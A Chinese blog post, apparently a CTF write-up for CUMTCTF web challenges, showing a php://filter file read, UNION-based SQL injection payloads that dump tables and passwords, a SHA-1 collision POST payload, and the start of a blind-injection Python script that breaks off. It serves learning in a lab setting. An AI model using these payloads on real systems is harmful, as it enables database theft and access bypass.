<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/feiji32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/feiji16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sunzhengyu99.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="CUMTCTF-wp">
<meta property="og:type" content="article">
<meta property="og:title" content="cumtctf">
<meta property="og:url" content="https://sunzhengyu99.github.io/2020/09/27/cumtctf/index.html">
<meta property="og:site_name" content="一路走到黑">
<meta property="og:description" content="CUMTCTF-wp">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sunzhengyu99.github.io/2020/09/27/cumtctf/w1.png">
<meta property="og:image" content="https://sunzhengyu99.github.io/2020/09/27/cumtctf/w2.png">
<meta property="og:image" content="https://sunzhengyu99.github.io/2020/09/27/cumtctf/w4.png">
<meta property="og:image" content="https://sunzhengyu99.github.io/2020/09/27/cumtctf/w2-1.png">
<meta property="og:image" content="https://sunzhengyu99.github.io/2020/09/27/cumtctf/w2-2.png">
<meta property="og:image" content="https://sunzhengyu99.github.io/2020/09/27/cumtctf/w2-3.png">
<meta property="article:published_time" content="2020-09-27T13:26:44.000Z">
<meta property="article:modified_time" content="2020-10-05T10:55:37.372Z">
<meta property="article:author" content="sunzy">
<meta property="article:tag" content="sql">
<meta property="article:tag" content="文件包含">
<meta property="article:tag" content="rsa">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://sunzhengyu99.github.io/2020/09/27/cumtctf/w1.png">

<link rel="canonical" href="https://sunzhengyu99.github.io/2020/09/27/cumtctf/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>cumtctf | 一路走到黑</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">一路走到黑</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">九层之台，起于垒土</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">38</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">10</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">26</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

  <a href="https://github.com/sunzhengyu99" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sunzhengyu99.github.io/2020/09/27/cumtctf/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/my.png">
      <meta itemprop="name" content="sunzy">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="一路走到黑">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          cumtctf
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-09-27 21:26:44" itemprop="dateCreated datePublished" datetime="2020-09-27T21:26:44+08:00">2020-09-27</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-10-05 18:55:37" itemprop="dateModified" datetime="2020-10-05T18:55:37+08:00">2020-10-05</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index"><span itemprop="name">ctf</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2020/09/27/cumtctf/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/09/27/cumtctf/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>8.3k</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="CUMTCTF-wp"><a href="#CUMTCTF-wp" class="headerlink" title="CUMTCTF-wp"></a>CUMTCTF-wp</h1><a id="more"></a>

<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h3><p>提示GET一个1,那就 url+?1</p>
<p><img src="/2020/09/27/cumtctf/w1.png" alt></p>
<p>提示post一个2</p>
<p>那就post一个</p>
<p><strong>注意的是要2=任意字符才出现源码</strong></p>
<p> <img src="/2020/09/27/cumtctf/w2.png" alt></p>
<p>审计代码，这里应该是利用file_get_contents()的漏洞直接读网页源码，并且提示flag在flag.php,直接<code>php://filter/read=convert.base64-encode/resource=flag.php</code>，读取base64源码之后解码即可</p>
<p><img src="/2020/09/27/cumtctf/w4.png" alt></p>
<p>PD9waHANCgkkZmxhZz0iQ1VNVENURnsxNzkwNTViNC1lOGY1LTQyZDItYmZlNC0wMjdkMTVlOTQ2YjJ9Ijs=</p>
<h3 id="babysql"><a href="#babysql" class="headerlink" title="babysql"></a>babysql</h3><p>首先判断是否存在注入<code>username=admin&amp;password=pw&#39;</code></p>
<p>在后面加上单引号后出现报错提示，确认有注入点</p>
<p>但是继续测试 <code>&#39;or 1=1 #</code>会出现</p>
<p><img src="/2020/09/27/cumtctf/w2-1.png" alt></p>
<p>判断存在黑名单过滤。</p>
<p>接下来就是判断是将什么加入黑名单了，经过字典测试发现是<strong>空格</strong>，这里可以使用/**/绕过。</p>
<p>先测试有多少列，<code>&#39;union/**/select/**/1,2,3,4,5,6,7#</code>  到第七的时候，页面报错。</p>
<p>   <code>&#39;union/**/select/**/1,2,3,4,5,6,7,8#</code> 到第八的时候显示下图，说明一共八列，并且第四列出现回显。</p>
<p><img src="/2020/09/27/cumtctf/w2-2.png" alt></p>
<p><strong>爆表</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=admin&amp;password=pw'union<span class="comment">/**/</span><span class="keyword">select</span><span class="comment">/**/</span><span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="keyword">group_concat</span>(TABLE_NAME),<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span><span class="comment">/**/</span><span class="keyword">from</span><span class="comment">/**/</span>information_schema.TABLES<span class="comment">/**/</span><span class="keyword">where</span><span class="comment">/**/</span>TABLE_SCHEMA=<span class="keyword">database</span>()<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p><strong>爆列名</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=admin&amp;password=pw'union<span class="comment">/**/</span><span class="keyword">select</span><span class="comment">/**/</span><span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="keyword">group_concat</span>(COLUMN_NAME),<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span><span class="comment">/**/</span><span class="keyword">from</span><span class="comment">/**/</span>information_schema.COLUMNS<span class="comment">/**/</span><span class="keyword">where</span><span class="comment">/**/</span>TABLE_NAME=<span class="string">'users'</span><span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p><code>user_id,first_name,last_name,user,password,avatar,last_login,failed_login</code>列名很多，选择password</p>
<p><strong>爆flag</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=admin&amp;password=pw'union<span class="comment">/**/</span><span class="keyword">select</span><span class="comment">/**/</span><span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="keyword">group_concat</span>(<span class="keyword">password</span>),<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span><span class="comment">/**/</span><span class="keyword">from</span><span class="comment">/**/</span><span class="keyword">users</span><span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/27/cumtctf/w2-3.png" alt></p>
<h3 id="secret"><a href="#secret" class="headerlink" title="secret"></a>secret</h3><p>扫描一下目录发现存在一个<a href="http://www.zip的文件，直接下载得到源码，下面就是一层一层的绕过" target="_blank" rel="noopener">www.zip的文件，直接下载得到源码，下面就是一层一层的绕过</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include_once</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'param1'</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    $str1=$_GET[<span class="string">'param1'</span>];</span><br><span class="line">    <span class="keyword">if</span>(file_get_contents($str1)!==<span class="string">'Suvin_wants_a_girlfriend'</span>)</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Suvin doesn't like you"</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'param2'</span>]))&#123;</span><br><span class="line">        $str2=$_GET[<span class="string">'param2'</span>];</span><br><span class="line">        <span class="keyword">if</span>(!is_numeric($str2))</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'Suvin prefers strings of Numbers'</span>);</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>($str2&lt;<span class="number">3600</span>*<span class="number">24</span>*<span class="number">30</span>)</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'Suvin says the num is too short'</span>);</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>($str2&gt;<span class="number">3600</span>*<span class="number">24</span>*<span class="number">31</span>)</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'Suvin says the num is too long'</span>);</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">"Suvin says he's falling in love with you!"</span>.<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">            sleep(intval($str2)); </span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'param1'</span>]) &amp;&amp; <span class="keyword">isset</span>($_POST[<span class="string">'param2'</span>])) &#123;</span><br><span class="line">            $str1=$_POST[<span class="string">'param1'</span>];</span><br><span class="line">            $str2=$_POST[<span class="string">'param2'</span>];</span><br><span class="line">            <span class="keyword">if</span>(strlen($str1)&gt;<span class="number">1000</span>)</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">"It's too long"</span>);</span><br><span class="line">            <span class="keyword">if</span>(((string)$str1!==(string)$str2)&amp;&amp;(sha1($str1)===sha1($str2)))</span><br><span class="line">                <span class="keyword">echo</span> $flag;</span><br><span class="line">            <span class="keyword">else</span> </span><br><span class="line">                <span class="keyword">die</span>(<span class="string">"It's so similar to md5"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>首先get方式获取两个参数，param1要等于那个字符串，这里使用php的data伪协议</p>
<p>param2要在<code>3600*24*30</code>和<code>3600*24*31</code>之间，可以取2.6e6,这两个参数绕过后，就要绕过下面的post方式上传的两个值</p>
<p>对parame1的长度进行了限制，并且两参数的字符串形式不相等，sha1的值要相等，首先想到的是与md5函数一样，使用数组绕过，但是这题没那么简单，试了很多次都不行。网上搜了一下，发现了一个很类似的题目（sha1弱碰撞），其中也给出符合要求的字符串。</p>
<p><a href="https://blog.csdn.net/caiqiiqi/article/details/68953730?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2~all~first_rank_v2~rank_v25-1-68953730.nonecase&utm_term=%E4%B8%8D%E5%90%8C%E5%AD%97%E7%AC%A6%E4%B8%B2sha1%E4%B8%80%E6%A0%B7" target="_blank" rel="noopener">点这里</a></p>
<p>完整的payload：</p>
<p><code>?param1=data://text/plain;base64,U3V2aW5fd2FudHNfYV9naXJsZnJpZW5k&amp;param2=0.26e7</code></p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST:</span><br><span class="line">param<span class="number">1</span>=<span class="symbol">%25</span>PDF<span class="number">-1.3</span><span class="symbol">%0</span>A<span class="symbol">%25</span><span class="symbol">%E2</span><span class="symbol">%E3</span><span class="symbol">%CF</span><span class="symbol">%D3</span><span class="symbol">%0</span>A<span class="symbol">%0</span>A<span class="symbol">%0</span>A<span class="number">1</span><span class="symbol">%200</span><span class="symbol">%20</span>obj<span class="symbol">%0</span>A<span class="symbol">%3</span>C<span class="symbol">%3</span>C/Width<span class="symbol">%202</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Height<span class="symbol">%203</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Type<span class="symbol">%204</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Subtype<span class="symbol">%205</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Filter<span class="symbol">%206</span><span class="symbol">%200</span><span class="symbol">%20</span>R/ColorSpace<span class="symbol">%207</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Length<span class="symbol">%208</span><span class="symbol">%200</span><span class="symbol">%20</span>R/BitsPerComponent<span class="symbol">%208</span><span class="symbol">%3</span>E<span class="symbol">%3</span>E<span class="symbol">%0</span>Astream<span class="symbol">%0</span>A<span class="symbol">%FF</span><span class="symbol">%D8</span><span class="symbol">%FF</span><span class="symbol">%FE</span><span class="symbol">%00</span><span class="symbol">%24</span>SHA<span class="number">-1</span><span class="symbol">%20</span>is<span class="symbol">%20</span>dead<span class="symbol">%21</span><span class="symbol">%21</span><span class="symbol">%21</span><span class="symbol">%21</span><span class="symbol">%21</span><span class="symbol">%85</span>/<span class="symbol">%EC</span><span class="symbol">%09</span><span class="symbol">%239</span>u<span class="symbol">%9</span>C<span class="number">9</span><span class="symbol">%B1</span><span class="symbol">%A1</span><span class="symbol">%C6</span><span class="symbol">%3</span>CL<span class="symbol">%97</span><span class="symbol">%E1</span><span class="symbol">%FF</span><span class="symbol">%FE</span><span class="symbol">%01</span><span class="symbol">%7</span>FF<span class="symbol">%DC</span><span class="symbol">%93</span><span class="symbol">%A6</span><span class="symbol">%B6</span><span class="symbol">%7</span>E<span class="symbol">%01</span><span class="symbol">%3</span>B<span class="symbol">%02</span><span class="symbol">%9</span>A<span class="symbol">%AA</span><span class="symbol">%1</span>D<span class="symbol">%B2V</span><span class="symbol">%0</span>BE<span class="symbol">%CAg</span><span class="symbol">%D6</span><span class="symbol">%88</span><span class="symbol">%C7</span><span class="symbol">%F8K</span><span class="symbol">%8</span>CLy<span class="symbol">%1</span>F<span class="symbol">%E0</span><span class="symbol">%2</span>B<span class="symbol">%3</span>D<span class="symbol">%F6</span><span class="symbol">%14</span><span class="symbol">%F8m</span><span class="symbol">%B1i</span><span class="symbol">%09</span><span class="symbol">%01</span><span class="symbol">%C5kE</span><span class="symbol">%C1S</span><span class="symbol">%0</span>A<span class="symbol">%FE</span><span class="symbol">%DF</span><span class="symbol">%B7</span><span class="symbol">%608</span><span class="symbol">%E9rr</span>/<span class="symbol">%E7</span><span class="symbol">%ADr</span><span class="symbol">%8</span>F<span class="symbol">%0</span>EI<span class="symbol">%04</span><span class="symbol">%E0F</span><span class="symbol">%C20W</span><span class="symbol">%0</span>F<span class="symbol">%E9</span><span class="symbol">%D4</span><span class="symbol">%13</span><span class="symbol">%98</span><span class="symbol">%AB</span><span class="symbol">%E1.</span><span class="symbol">%F5</span><span class="symbol">%BC</span><span class="symbol">%94</span><span class="symbol">%2</span>B<span class="symbol">%E35B</span><span class="symbol">%A4</span><span class="symbol">%80</span>-<span class="symbol">%98</span><span class="symbol">%B5</span><span class="symbol">%D7</span><span class="symbol">%0</span>F<span class="symbol">%2</span>A<span class="number">3</span>.<span class="symbol">%C3</span><span class="symbol">%7</span>F<span class="symbol">%AC5</span><span class="symbol">%14</span><span class="symbol">%E7M</span><span class="symbol">%DC</span><span class="symbol">%0</span>F<span class="symbol">%2</span>C<span class="symbol">%C1</span><span class="symbol">%A8t</span><span class="symbol">%CD</span><span class="symbol">%0</span>Cx<span class="number">0</span>Z<span class="symbol">%21</span>Vda<span class="number">0</span><span class="symbol">%97</span><span class="symbol">%89</span><span class="symbol">%60</span>k<span class="symbol">%D0</span><span class="symbol">%BF</span><span class="symbol">%3</span>F<span class="symbol">%98</span><span class="symbol">%CD</span><span class="symbol">%A8</span><span class="symbol">%04</span>F<span class="symbol">%29</span><span class="symbol">%A1</span>&amp;param<span class="number">2</span>=<span class="symbol">%25</span>PDF<span class="number">-1.3</span><span class="symbol">%0</span>A<span class="symbol">%25</span><span class="symbol">%E2</span><span class="symbol">%E3</span><span class="symbol">%CF</span><span class="symbol">%D3</span><span class="symbol">%0</span>A<span class="symbol">%0</span>A<span class="symbol">%0</span>A<span class="number">1</span><span class="symbol">%200</span><span class="symbol">%20</span>obj<span class="symbol">%0</span>A<span class="symbol">%3</span>C<span class="symbol">%3</span>C/Width<span class="symbol">%202</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Height<span class="symbol">%203</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Type<span class="symbol">%204</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Subtype<span class="symbol">%205</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Filter<span class="symbol">%206</span><span class="symbol">%200</span><span class="symbol">%20</span>R/ColorSpace<span class="symbol">%207</span><span class="symbol">%200</span><span class="symbol">%20</span>R/Length<span class="symbol">%208</span><span class="symbol">%200</span><span class="symbol">%20</span>R/BitsPerComponent<span class="symbol">%208</span><span class="symbol">%3</span>E<span class="symbol">%3</span>E<span class="symbol">%0</span>Astream<span class="symbol">%0</span>A<span class="symbol">%FF</span><span class="symbol">%D8</span><span class="symbol">%FF</span><span class="symbol">%FE</span><span class="symbol">%00</span><span class="symbol">%24</span>SHA<span class="number">-1</span><span class="symbol">%20</span>is<span class="symbol">%20</span>dead<span class="symbol">%21</span><span class="symbol">%21</span><span class="symbol">%21</span><span class="symbol">%21</span><span class="symbol">%21</span><span class="symbol">%85</span>/<span class="symbol">%EC</span><span class="symbol">%09</span><span class="symbol">%239</span>u<span class="symbol">%9</span>C<span class="number">9</span><span class="symbol">%B1</span><span class="symbol">%A1</span><span class="symbol">%C6</span><span class="symbol">%3</span>CL<span class="symbol">%97</span><span class="symbol">%E1</span><span class="symbol">%FF</span><span class="symbol">%FE</span><span class="symbol">%01</span>sF<span class="symbol">%DC</span><span class="symbol">%91</span>f<span class="symbol">%B6</span><span class="symbol">%7</span>E<span class="symbol">%11</span><span class="symbol">%8</span>F<span class="symbol">%02</span><span class="symbol">%9</span>A<span class="symbol">%B6</span><span class="symbol">%21</span><span class="symbol">%B2V</span><span class="symbol">%0</span>F<span class="symbol">%F9</span><span class="symbol">%CAg</span><span class="symbol">%CC</span><span class="symbol">%A8</span><span class="symbol">%C7</span><span class="symbol">%F8</span><span class="symbol">%5</span>B<span class="symbol">%A8Ly</span><span class="symbol">%03</span><span class="symbol">%0</span>C<span class="symbol">%2</span>B<span class="symbol">%3</span>D<span class="symbol">%E2</span><span class="symbol">%18</span><span class="symbol">%F8m</span><span class="symbol">%B3</span><span class="symbol">%A9</span><span class="symbol">%09</span><span class="symbol">%01</span><span class="symbol">%D5</span><span class="symbol">%DFE</span><span class="symbol">%C1O</span><span class="symbol">%26</span><span class="symbol">%FE</span><span class="symbol">%DF</span><span class="symbol">%B3</span><span class="symbol">%DC8</span><span class="symbol">%E9j</span><span class="symbol">%C2</span>/<span class="symbol">%E7</span><span class="symbol">%BDr</span><span class="symbol">%8</span>F<span class="symbol">%0</span>EE<span class="symbol">%BC</span><span class="symbol">%E0F</span><span class="symbol">%D2</span><span class="symbol">%3</span>CW<span class="symbol">%0</span>F<span class="symbol">%EB</span><span class="symbol">%14</span><span class="symbol">%13</span><span class="symbol">%98</span><span class="symbol">%BBU.</span><span class="symbol">%F5</span><span class="symbol">%A0</span><span class="symbol">%A8</span><span class="symbol">%2</span>B<span class="symbol">%E31</span><span class="symbol">%FE</span><span class="symbol">%A4</span><span class="symbol">%807</span><span class="symbol">%B8</span><span class="symbol">%B5</span><span class="symbol">%D7</span><span class="symbol">%1</span>F<span class="symbol">%0</span>E<span class="number">3</span>.<span class="symbol">%DF</span><span class="symbol">%93</span><span class="symbol">%AC5</span><span class="symbol">%00</span><span class="symbol">%EBM</span><span class="symbol">%DC</span><span class="symbol">%0</span>D<span class="symbol">%EC</span><span class="symbol">%C1</span><span class="symbol">%A8dy</span><span class="symbol">%0</span>Cx<span class="symbol">%2</span>Cv<span class="symbol">%21</span>V<span class="symbol">%60</span><span class="symbol">%DD0</span><span class="symbol">%97</span><span class="symbol">%91</span><span class="symbol">%D0k</span><span class="symbol">%D0</span><span class="symbol">%AF</span><span class="symbol">%3</span>F<span class="symbol">%98</span><span class="symbol">%CD</span><span class="symbol">%A4</span><span class="symbol">%BCF</span><span class="symbol">%29</span><span class="symbol">%B1</span></span><br></pre></td></tr></table></figure>

<p><strong>还有一个很坑的地方，hackbar上传时没有作用，只能用bp抓包上传，抓包时注意先随便post一个参数，这样数据包才是post方式，然后贴上上面的两个参数值</strong></p>
<h3 id="babysql2"><a href="#babysql2" class="headerlink" title="babysql2"></a>babysql2</h3><p>查询语句与第一个注入相同，但是这题不给回显，猜测是盲注，但是好像过滤了更多的关键字</p>
<p>在1的基础上额外过滤了 ‘ ， ascii ， mid ， substr ，关闭了报错回显和输出，但是查询成功或者失败 回显不同，因此可以bool注入。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">url = <span class="string">'http://219.219.61.234:20004/'</span></span><br><span class="line">password = <span class="string">""</span></span><br><span class="line">string = [ord(i) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz!_@-&#125;&#123;'</span>]<span class="comment">#将字母转换为ascii码</span></span><br><span class="line">a = <span class="string">'0x5e'</span>   <span class="comment"># '\'的ascii码值</span></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> string:</span><br><span class="line">        <span class="keyword">if</span> (hex(j)[<span class="number">2</span>:]==<span class="string">'7b'</span>):</span><br><span class="line">            